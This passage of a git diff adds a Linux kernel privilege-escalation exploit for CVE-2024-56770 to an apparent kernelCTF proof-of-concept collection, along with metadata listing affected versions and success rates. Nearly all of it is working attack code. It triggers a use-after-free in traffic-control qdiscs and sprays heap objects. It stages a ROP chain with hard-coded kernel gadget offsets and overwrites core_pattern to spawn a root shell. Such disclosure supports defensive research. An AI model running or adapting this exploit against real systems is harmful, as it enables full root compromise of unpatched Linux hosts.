msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_multiq(int fd) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 9; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = TC_H_ROOT; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + uint32_t handle = 0x1000; + + addattr_l(msg, 0x1000, TCA_KIND, "multiq", 7); + + char data[0x10] = {0,}; + + addattr_l(msg, 0x1000, TCA_OPTIONS, data, 8); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + return sendmsg(fd, &msgh, 0); +} + +int del_qdisc_multiq(int fd) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST; + msg->nlmsg_type = RTM_DELQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 9; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = TC_H_ROOT; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + uint32_t handle = 0x1000; + + addattr_l(msg, 0x1000, TCA_KIND, "multiq", 7); + + char data[0x10] = {0,}; + + addattr_l(msg, 0x1000, TCA_OPTIONS, data, 8); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + return sendmsg(fd, &msgh, 0); +} + +int add_class_drr(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWTCLASS; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "drr", 4); + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int del_class_drr(int fd, uint32_t handle) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST; + msg->nlmsg_type = RTM_DELTCLASS; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = TC_H_ROOT; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_filter_basic(int fd, uint32_t parent, uint32_t classid) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + char sel[0x100] = {0,}; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWTFILTER; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = 0; + + uint32_t prio = 0; + uint32_t protocol = 0x300; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "basic", 6); + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_l(msg, 0x1000, TCA_BASIC_CLASSID, &classid, 4); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + return 1; +} + +#define QDISC_RESET 0xe83860 +#define CORE_PATTERN 0x2bbace0 +#define COPY_FROM_USER 0x87db00 +#define MSLEEP 0x232f10 + +#define PUSH_RBX_POP_RSP_RBP_RET 0x10234d1 // push rbx ; and byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; jmp 0xffffffff82605280 +#define POP_RDI_POP_RSI_POP_RDX_POP_RET 0x0d5e29 // pop rdi ; pop rsi ; pop rdx ; pop rcx ; jmp 0xffffffff82605280 +#define POP_POP_POP_RET 0x0d5e2a // pop rdx ; pop rcx ; jmp 0xffffffff82605280 + +// CPU entry area pointers. We prepare some memory here that will be referenced +// by the ROP chains. +// We need: +// - the struct nft_expr_ops { .eval } member +#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (uint64_t)cpu * 0x3b000) +#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58) + +#define PEEK_OFF 0x38 + +struct cpu_entry_area_payload { + uint64_t regs[16]; +}; + +static void sig_handler(int s) {} + +static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) { +asm volatile ( + "mov %0, %%rsp\n" + "pop %%r15\n" + "pop %%r14\n" + "pop %%r13\n" + "pop %%r12\n" + "pop %%rbp\n" + "pop %%rbx\n" + "pop %%r11\n" + "pop %%r10\n" + "pop %%r9\n" + "pop %%r8\n" + "pop %%rax\n" + "pop %%rcx\n" + "pop %%rdx\n" + "pop %%rsi\n" + "pop %%rdi\n" + "divq (0x1234000)\n" + : : "r"(payload) +); +__builtin_unreachable(); +} + +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { + if (fork()) { + return; + } + + struct cpu_entry_area_payload payload = {}; + + payload.regs[1] = kbase + POP_POP_POP_RET; + payload.regs[2] = kbase + QDISC_RESET; // multiq->ops->peek + payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF + 0x10 ; // fake ops + payload.regs[4] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset + payload.regs[5] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET; + payload.regs[6] = kbase + CORE_PATTERN; + payload.regs[7] = MMAP_ADDR; + payload.regs[8] = strlen((char*)MMAP_ADDR); + payload.regs[9] = 0; + payload.regs[10] = kbase + COPY_FROM_USER; + payload.regs[11] = kbase + MSLEEP; + + set_affinity(1); + signal(SIGFPE, sig_handler); + signal(SIGTRAP, sig_handler); + signal(SIGSEGV, sig_handler); + setsid(); + + while(1){ + write_cpu_entry_area(&payload); + usleep(1000); + } +} + +void spray_sendmsg(char *buff, size_t size) { + struct msghdr msg = {0}; + struct sockaddr_in addr = {0}; + int sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + addr.sin_family = AF_INET; + addr.sin_port = htons(6666); + + msg.msg_control = buff; + msg.msg_controllen = size; + msg.msg_name = (caddr_t)&addr; + msg.msg_namelen = sizeof(addr); + + sendmsg(sockfd, &msg, 0); +} + +#define USER_KEY_PAYLOAD_HEADER_LEN 0x18 +int keys[0x1000]; + +/* +* Allocate a user_key_payload structure. +*/ +int key_alloc(int i, char *buff, size_t size) +{ + char desc[256] = { 0 }; + key_serial_t key; + char *payload; + + sprintf(desc, "payload_%d", i); + + size -= USER_KEY_PAYLOAD_HEADER_LEN; + payload = buff ? buff : calloc(1, size); + + if (!buff) + *(uint64_t *)&payload[0] = i; // Tag the key + + keys[i] = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING); + + if (keys[i] < 0) { + perror("[x] key_alloc()"); + return -1; + } + + return 0; +} + +#ifndef SOL_UDP +#define SOL_UDP 17 // UDP protocol value for setsockopt +#endif + +#ifndef UDP_SEGMENT +#define UDP_SEGMENT 103 // GSO segmentation option +#endif + +void loopback_send (uint64_t p, uint64_t size) { + struct sockaddr iaddr = { AF_INET }; + int priority = p; + char data[0x4000] = {0,}; + + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + + setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)); + + int gso_size = 1300; + + setsockopt(inet_sock_fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size)); + + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + + if (write(inet_sock_fd, data, size) == -1) + err_exit("[-] inet write"); + + close(inet_sock_fd); +} + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +// 156250 = PSCHED_NS2TICKS(10000000) +#define NETEM_10MS 156250 + +#define MTU_VALUE 1500 + +// The freed object is reclaimed immediately +// Spraying a small number of objects is enough +#define SPRAY_COUNT 3 +#define SPRAY_SIZE 0x2008 + +void exploit(){ + const unsigned int drr_qdisc = 0x10000; + const unsigned int drr_class_uaf = 0x10001; + + const unsigned int drr_qdisc_trigger = 0x20000; + const unsigned int drr_class_trigger = 0x20001; + const unsigned int drr_class_delay = 0x20002; + + const unsigned int netem_qdisc_trigger = 0x30000; + const unsigned int netem_qdisc_delay = 0x50000; + + const unsigned int tbf_qdisc = 0x40000; + + int sockfd = socket(PF_NETLINK, SOCK_RAW, 0); + + add_qdisc_drr(sockfd, TC_H_ROOT, drr_qdisc); + add_filter_basic(sockfd, drr_qdisc, drr_class_uaf); + add_class_drr(sockfd, drr_qdisc, drr_class_uaf); + + add_qdisc_drr(sockfd, drr_class_uaf, drr_qdisc_trigger); + add_class_drr(sockfd, drr_qdisc_trigger, drr_class_trigger); + add_class_drr(sockfd, drr_qdisc_trigger, drr_class_delay); + + add_qdisc_netem(sockfd, drr_class_trigger, netem_qdisc_trigger, NETEM_10MS); + add_qdisc_tbf(sockfd, netem_qdisc_trigger, tbf_qdisc); + + add_qdisc_netem(sockfd, drr_class_delay, netem_qdisc_delay, NETEM_10MS); + + loopback_send(drr_class_trigger, MTU_VALUE+1); + + // wait for netem delay + usleep(50*1000); + + // preventing `drr_delete_class()` from calling `list_del` because `drr_qdisc_trigger` has a qlen of 0 + loopback_send(drr_class_trigger, MTU_VALUE); + + del_class_drr(sockfd, drr_class_trigger); + + // wait for destroy + usleep(50*1000); + + // make the qlen of drr_qdisc_trigger 0 + loopback_send(drr_class_delay, MTU_VALUE); + + del_class_drr(sockfd, drr_class_uaf); + + // wait for destroy + usleep(50*1000); + + add_qdisc_multiq(sockfd); + del_qdisc_multiq(sockfd); + + // wait for destroy + usleep(50*1000); + + uint64_t fake_qdiscs[SPRAY_SIZE/8] = {0,}; + + fake_qdiscs[1] = PAYLOAD_LOCATION(1); + + for(int i = 0 ; i < SPRAY_COUNT; i++){ + spray_sendmsg((char*) fake_qdiscs, SPRAY_SIZE); + key_alloc(i, (char*)(fake_qdiscs+USER_KEY_PAYLOAD_HEADER_LEN), SPRAY_SIZE); + } + + loopback_send(drr_class_uaf, MTU_VALUE); +} + +int main(int argc, char **argv) { + set_affinity(0); + + bypass_kaslr(0); + + if (argc > 1) + { + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger"); + } + + if (fork() == 0) // this process is used to trigger core_pattern exploit + { + sleep(1); + set_affinity(1); + setsid(); + crash(""); + } + + char *core = (void *)mmap((void *)MMAP_ADDR, MMAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0); + strcpy(core, "|/proc/%P/fd/666 %P"); // put payload string into known address which will used by ebpf shellcode + + setup_cpu_entry_area(); + +retry: + new_ns(); + + ip_link_lo_up(); + ip_link_set_lo_mtu_1500(); + + // ip link add outer0 numrxqueues 16 numtxqueues 1025 type veth peer + add_veth_link("outer0", "inner0", 16, 1025); + + exploit(); + + goto retry; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/metadata.json new file mode 100644 index 000000000..46eda0781 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/metadata.json @@ -0,0 +1,41 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp203", + "exp208" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=647cef20e649c576dff271e018d5d15d998b629d", + "cve": "CVE-2024-56770", + "affected_versions": [ + "3.3 - 6.13-rc2" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN, CAP_NET_RAW" + ], + "kernel_config": [ + "CONFIG_NET_SCHED, CONFIG_NET_SCH_NETEM" + ] + } + }, + "exploits": { + "cos-109-17800.372.38": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "9 times success per 10 times run" + }, + "mitigation-v3b-6.1.55": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "7 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp203.tar.gz b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp203.tar.gz new file mode 100644 index 000000000..39bba08a6 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp203.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp208.tar.gz b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp208.tar.gz new file mode 100644 index 000000000..2f232eac2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp208.tar.gz differ